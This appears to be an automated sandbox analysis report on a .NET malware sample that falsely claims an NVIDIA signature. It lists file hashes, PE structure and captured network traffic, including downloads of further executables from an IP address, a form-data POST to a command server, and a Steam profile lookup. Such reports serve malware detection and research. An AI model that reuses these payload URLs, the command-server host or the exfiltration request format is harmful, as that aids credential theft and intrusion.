SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9331069167408058
Encrypted:	false
SSDEEP:	192:9xox3sB70BU/JNea6DkzuiFHZ24IO8Jo:LoxcOBU/JNea+kzuiFHY4IO8Jo
MD5:	4C681D382D78ACFAE29E14CB0D8AEC08
SHA1:	01B591493D8406BD08611471C8101C45A75F3A9F
SHA-256:	2D7311415E66E28A66C5A6839E965B5A9C5B9D4509FE4C8F321D7DF1AB1AA577
SHA-512:	6881D7892B05B08D651B10C145FC0FDC6B6F43C1574A520EA15DFD618CE15372F969379397C1048BE07A8F0CF8408DE274727728A1B65E82C74BBC36829511F8
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.7.6.3.8.2.6.0.4.3.0.1.7.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.1.7.6.3.8.2.8.8.7.1.0.3.0.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.4.2.f.e.3.3.c.-.5.2.3.c.-.4.f.c.e.-.8.4.0.b.-.e.2.6.2.4.6.7.f.5.a.3.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.8.d.7.2.b.8.e.-.e.f.0.e.-.4.f.e.9.-.9.7.1.8.-.7.8.e.0.e.8.b.4.e.c.2.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.M.F.D.B.G...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.I.D.S.M...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.0.b.4.-.0.0.0.1.-.0.0.1.4.-.b.3.7.7.-.6.6.c.7.7.b.0.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.a.1.9.7.6.b.b.9.f.e.0.7.a.6.c.7.6.7.1.3.d.6.a.4.1.1.0.b.7.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.6.3.9.e.9.e.8.7.1.0.3.f.5.7.6.6.1.7.e.d.0.8.c.5.0.9.1.0.c.a.9.2.f.e.5.c.8.c.5.b.!.M.F.D.B.

Process:	C:\Users\user\Desktop\file.exe
File Type:	CSV text
Category:	modified
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

File type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.989695899083701
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	413'224 bytes
MD5:	8b0b12811b60a92a72b636a46fadb0ba
SHA1:	0ab6b31b69b7964de2e9639169d036c68f9efd76
SHA256:	1174cade1bd7b389c084b340898d4afd84e1145d9294d8a550f3a532f09cda7c
SHA512:	abf908cb7505acd792aa1d9a346ec1b635f5c078ad2104b5d5a0678cc54e216a843fbacba25ebff6a7baed6a6463ee8fc433ff1c71178775366b7f4aade1227a
SSDEEP:	12288:dHROWCWIpXQ6dvhXe+iGaXImXN18/7LV+z+0EO:ludvbwX4/7LV/0t
TLSH:	4D9423FA9B688535FC8F423126FBB34EDA375E97269791CF50418A0A3E2D35030295B7
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k#.f.............................<... ...@....@.. ....................................`................................

Entrypoint:	0x463cee
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F4236B [Wed Sep 25 14:51:23 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Signature Valid:	false
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	13/01/2023 01:00:00 17/01/2026 00:59:59
Subject Chain	CN=NVIDIA Corporation, OU=2-J, O=NVIDIA Corporation, L=Santa Clara, S=California, C=US
Version:	3
Thumbprint MD5:	5F1B6B6C408DB2B4D60BAA489E9A0E5A
Thumbprint SHA-1:	15F760D82C79D22446CC7D4806540BF632B1E104
Thumbprint SHA-256:	28AF76241322F210DA473D9569EFF6F27124C4CA9F43933DA547E8D068B0A95D
Serial:	0997C56CAA59055394D9A9CDB8BEEB56

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x63c94	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x64000	0x5b8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x62800	0x2628
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x66000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x63b5c	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x61cf4	0x61e00	70e21a1fd08ee996ef42e6767420d306	False	0.9940308708492975	data	7.996013819094471	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x64000	0x5b8	0x600	c5e8314566f7a5f7708391414f4a9092	False	0.4368489583333333	data	4.114126439113982	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x66000	0xc	0x200	a9b332d968f232dba11fe8f8f6bc79d9	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x640a0	0x324	data			0.4552238805970149
RT_MANIFEST	0x643c8	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5469387755102041

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 25, 2024 20:49:18.073144913 CEST	55834	53	192.168.2.5	1.1.1.1
Sep 25, 2024 20:49:18.080662966 CEST	53	55834	1.1.1.1	192.168.2.5
Sep 25, 2024 20:50:00.997594118 CEST	57662	53	192.168.2.5	1.1.1.1
Sep 25, 2024 20:50:01.073268890 CEST	53	57662	1.1.1.1	192.168.2.5
Sep 25, 2024 20:50:03.957945108 CEST	50223	53	192.168.2.5	1.1.1.1
Sep 25, 2024 20:50:03.965040922 CEST	53	50223	1.1.1.1	192.168.2.5
Sep 25, 2024 20:50:08.202058077 CEST	54992	53	192.168.2.5	1.1.1.1
Sep 25, 2024 20:50:08.212153912 CEST	53	54992	1.1.1.1	192.168.2.5
Sep 25, 2024 20:50:08.936630964 CEST	63337	53	192.168.2.5	1.1.1.1
Sep 25, 2024 20:50:08.955864906 CEST	53	63337	1.1.1.1	192.168.2.5
Sep 25, 2024 20:50:10.492098093 CEST	63087	53	192.168.2.5	1.1.1.1
Sep 25, 2024 20:50:11.273422003 CEST	53	63087	1.1.1.1	192.168.2.5
Sep 25, 2024 20:50:13.222928047 CEST	56512	53	192.168.2.5	1.1.1.1
Sep 25, 2024 20:50:13.239023924 CEST	53	56512	1.1.1.1	192.168.2.5
Sep 25, 2024 20:50:14.384182930 CEST	55767	53	192.168.2.5	1.1.1.1
Sep 25, 2024 20:50:14.401616096 CEST	53	55767	1.1.1.1	192.168.2.5
Sep 25, 2024 20:50:15.858640909 CEST	53002	53	192.168.2.5	1.1.1.1
Sep 25, 2024 20:50:16.081012011 CEST	53	53002	1.1.1.1	192.168.2.5
Sep 25, 2024 20:50:19.533698082 CEST	50295	53	192.168.2.5	1.1.1.1
Sep 25, 2024 20:50:19.546896935 CEST	53	50295	1.1.1.1	192.168.2.5
Sep 25, 2024 20:50:21.183860064 CEST	54644	53	192.168.2.5	1.1.1.1
Sep 25, 2024 20:50:21.210648060 CEST	53	54644	1.1.1.1	192.168.2.5
Sep 25, 2024 20:50:23.741942883 CEST	54607	53	192.168.2.5	1.1.1.1
Sep 25, 2024 20:50:23.756778955 CEST	53	54607	1.1.1.1	192.168.2.5
Sep 25, 2024 20:50:25.416115999 CEST	63639	53	192.168.2.5	1.1.1.1
Sep 25, 2024 20:50:25.423367023 CEST	53	63639	1.1.1.1	192.168.2.5
Sep 25, 2024 20:50:26.966331959 CEST	64267	53	192.168.2.5	1.1.1.1
Sep 25, 2024 20:50:26.988441944 CEST	53	64267	1.1.1.1	192.168.2.5

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 20:49:58.660273075 CEST	191	OUT	GET /prog/66f424e80b9cc_idsmds.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 147.45.44.104 Cache-Control: no-cache
Sep 25, 2024 20:49:59.306701899 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 25 Sep 2024 18:49:59 GMT Content-Type: application/octet-stream Content-Length: 26112 Last-Modified: Wed, 25 Sep 2024 14:57:44 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66f424e8-6600" X-Content-Type-Options: nosniff Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 03 70 14 f9 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 5c 00 00 00 08 00 00 00 00 00 00 be 7b 00 00 00 20 00 00 00 80 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 00 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 68 7b 00 00 53 00 00 00 00 80 00 00 86 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELp"0\{ @ `h{S H.text[ \ `.rsrc^@@.relocd@B{HtC7((.s(32{(2{(6\|(46\|(46\|(4RsE%oF`oGF(H(I(+oM%:&(N{oOZ{ rp((Z2{"(=6\|$(46\|((46\|,(46\|4(46\|7(4.(g(+rp(:r/p(;sl<*6\|@(
Sep 25, 2024 20:49:59.306864977 CEST	1236	IN	Data Raw: 34 00 00 0a 2a 36 02 7c 47 00 00 04 03 28 34 00 00 0a 2a 36 02 7c 51 00 00 04 03 28 91 00 00 0a 2a 36 02 7c 54 00 00 04 03 28 91 00 00 0a 2a 36 02 7c 58 00 00 04 03 28 34 00 00 0a 2a 36 02 7c 5d 00 00 04 03 28 34 00 00 0a 2a 13 30 04 00 6e 00 00 Data Ascii: 46\|G(46\|Q(6\|T(6\|X(46\|](40n(s(rpo(sooo o!io"o#(o$+*07(%}}}\|
Sep 25, 2024 20:49:59.306876898 CEST	1236	IN	Data Raw: 00 04 7b 0a 00 00 04 28 16 00 00 06 3a 20 01 00 00 02 7b 16 00 00 04 02 7b 17 00 00 04 7b 0a 00 00 04 17 28 3f 00 00 0a 02 7b 17 00 00 04 7b 0a 00 00 04 28 15 00 00 06 02 7b 17 00 00 04 7b 0a 00 00 04 28 18 00 00 06 6f 2d 00 00 0a 13 07 12 07 28 Data Ascii: {(: {{{(?{{({{(o-(0:A%}}\|(+:{\|%}(.{{(o-(0:A%}}\|(+{
Sep 25, 2024 20:49:59.306886911 CEST	1236	IN	Data Raw: 00 00 00 13 30 08 00 40 00 00 00 00 00 00 00 72 a0 01 00 70 28 01 00 00 06 73 54 00 00 0a 28 55 00 00 0a 28 56 00 00 0a 74 20 00 00 02 02 7b 1d 00 00 04 6f 4d 00 00 06 75 1f 00 00 02 25 02 7b 1c 00 00 04 6f 51 00 00 06 6f 53 00 00 06 2a 1b 30 03 Data Ascii: 0@rp(sT(U(Vt {oMu%{oQoS0}~Prp(oQ9NoW8%rp(oX9oYXi?{{oR9oSYo0@
Sep 25, 2024 20:49:59.306896925 CEST	896	IN	Data Raw: 30 00 00 04 fe 15 05 00 00 1b 02 15 25 0a 7d 2b 00 00 04 12 05 28 66 00 00 0a 0b 02 07 7d 31 00 00 04 02 16 7d 32 00 00 04 38 91 00 00 00 73 27 00 00 06 25 02 7b 31 00 00 04 02 7b 32 00 00 04 9a 7d 22 00 00 04 fe 06 28 00 00 06 73 5e 00 00 0a 28 Data Ascii: 0%}+(f}1}28s'%{1{2}"(s^(_o-(0:A%}+}/\|,(+L{/\|/%}+(.{2X}2{2{1i?\}1rp(([rp(
Sep 25, 2024 20:49:59.306910038 CEST	1236	IN	Data Raw: 00 04 12 00 28 15 00 00 2b 12 00 7c 40 00 00 04 28 27 00 00 0a 2a 00 13 30 02 00 2f 00 00 00 16 00 00 11 12 00 28 25 00 00 0a 7d 47 00 00 04 12 00 15 7d 46 00 00 04 12 00 7c 47 00 00 04 12 00 28 16 00 00 2b 12 00 7c 47 00 00 04 28 27 00 00 0a 2a Data Ascii: (+\|@('0/(%}G}F\|G(+\|G('0/(%}X}W\|X(+\|X('07(i}T}U}S\|T(+\|T(k0/(i}Q}P
Sep 25, 2024 20:49:59.306921005 CEST	1236	IN	Data Raw: 02 1f fe 7d 3f 00 00 04 02 7c 40 00 00 04 28 33 00 00 0a 2a 00 00 00 41 34 00 00 02 00 00 00 6c 01 00 00 7f 00 00 00 eb 01 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 07 00 00 00 86 02 00 00 8d 02 00 00 1c 00 00 00 31 00 00 01 1b 30 07 00 24 04 00 Data Ascii: }?\|@(3*A4l10${FE<%(7o}(~:A%}F}I\|G(+{I\|I%}F((8o}(~:A
Sep 25, 2024 20:49:59.306934118 CEST	1236	IN	Data Raw: 70 28 01 00 00 06 6f 88 00 00 0a 6f 7d 00 00 0a 0c 12 02 28 7e 00 00 0a 3a 3f 00 00 00 02 16 25 0a 7d 50 00 00 04 02 08 7d 52 00 00 04 02 7c 51 00 00 04 12 02 02 28 21 00 00 2b dd b7 00 00 00 02 7b 52 00 00 04 0c 02 7c 52 00 00 04 fe 15 0b 00 00 Data Ascii: p(oo}(~:?%}P}R\|Q(!+{R\|R%}P(ou&((o8&o@or<Xi?rp(}P\|Q(}P\|Q(
Sep 25, 2024 20:49:59.306946039 CEST	1236	IN	Data Raw: 00 00 0a 0b 12 01 28 30 00 00 0a 3a 3f 00 00 00 02 17 25 0a 7d 5c 00 00 04 02 07 7d 5e 00 00 04 02 7c 5d 00 00 04 12 01 02 28 26 00 00 2b dd 0a 01 00 00 02 7b 5e 00 00 04 0b 02 7c 5e 00 00 04 fe 15 07 00 00 01 02 15 25 0a 7d 5c 00 00 04 12 01 28 Data Ascii: (0:?%}\}^\|](&+{^\|^%}\(.(5o-(0:?%}\}^\|](&+{^\|^%}\(.#$@((o-(0:?%}\}^\|](&
Sep 25, 2024 20:49:59.306957960 CEST	1236	IN	Data Raw: 00 21 00 03 01 10 00 42 00 00 00 05 00 1e 00 23 00 03 01 10 00 52 01 00 00 05 00 22 00 27 00 03 01 10 00 03 03 00 00 11 00 23 00 29 00 03 01 10 00 59 03 00 00 11 00 27 00 2b 00 03 01 10 00 e5 03 00 00 11 00 2b 00 2d 00 03 01 10 00 3d 01 00 00 11 Data Ascii: !B#R"'#)Y'++-=3/61:3=<z>>?@BFBIPDSFWH\J_L
Sep 25, 2024 20:49:59.312526941 CEST	1236	IN	Data Raw: 00 12 00 50 20 00 00 00 00 86 18 dc 0d 27 00 13 00 50 20 00 00 00 00 86 18 dc 0d 27 00 13 00 d6 20 00 00 00 00 83 00 08 01 69 00 13 00 50 20 00 00 00 00 86 18 dc 0d 27 00 14 00 f4 2a 00 00 00 00 83 00 e6 00 27 00 14 00 50 20 00 00 00 00 86 18 dc Data Ascii: P 'P ' iP ''P 'L+'P '+ ' Io4,'P '!','!U-'!U.
Sep 25, 2024 20:50:01.199445009 CEST	192	OUT	GET /prog/66f4247d51812_lfdsjna.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 147.45.44.104 Cache-Control: no-cache
Sep 25, 2024 20:50:01.391772985 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 25 Sep 2024 18:50:01 GMT Content-Type: application/octet-stream Content-Length: 377384 Last-Modified: Wed, 25 Sep 2024 14:55:57 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66f4247d-5c228" X-Content-Type-Options: nosniff Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 76 23 f4 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 92 05 00 00 08 00 00 00 00 00 00 ee b0 05 00 00 20 00 00 00 c0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 b0 05 00 57 00 00 00 00 c0 05 00 b8 05 00 00 00 00 00 00 00 00 00 00 00 9c 05 00 28 26 00 00 00 e0 05 00 0c 00 00 00 5c af 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELv#f @ `W(&\ H.text `.rsrc@@.reloc@BHM\=S!}St&Pi@2^-4N^IGXC:,<JI{y]cf4sO);xozdi0a4YZyR7U8fdL*eq71CWBmKL$f'O6,-Bh(l}H7$$qyb@g@B[1+sIrZodd]X6fH=#5Xe!U]}#Ov

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 20:50:03.976325035 CEST	63	OUT	GET / HTTP/1.1 Host: api.ipify.org Connection: Keep-Alive
Sep 25, 2024 20:50:05.210412025 CEST	227	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 18:50:04 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8c8d32a37f654251-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33
Sep 25, 2024 20:50:05.211638927 CEST	227	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 18:50:04 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8c8d32a37f654251-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33
Sep 25, 2024 20:50:05.212116957 CEST	227	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 18:50:04 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8c8d32a37f654251-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 20:50:06.408675909 CEST	63	OUT	GET / HTTP/1.1 Host: api.ipify.org Connection: Keep-Alive
Sep 25, 2024 20:50:06.895653009 CEST	227	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 18:50:06 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8c8d32b0ad8d438b-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 20:50:08.262001991 CEST	281	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----FIDHIEBAAKJDHIECAAFH User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: cowod.hopto.org Content-Length: 3213 Connection: Keep-Alive Cache-Control: no-cache
Sep 25, 2024 20:50:08.262001991 CEST	3213	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 34 34 32 66 31 Data Ascii: ------FIDHIEBAAKJDHIECAAFHContent-Disposition: form-data; name="token"d442f14c3bcec41cd36d7e4df48c5d17------FIDHIEBAAKJDHIECAAFHContent-Disposition: form-data; name="build_id"9bf5e431869643a2ac397d2dc0d687fb------FIDHIEBAAKJDHI

Timestamp	Bytes transferred	Direction	Data
2024-09-25 18:49:19 UTC	119	OUT	GET /profiles/76561199780418869 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache
2024-09-25 18:49:19 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Wed, 25 Sep 2024 18:49:19 GMT Content-Length: 34725 Connection: close Set-Cookie: sessionid=431fa57a46018b55e8a208da; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-09-25 18:49:19 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
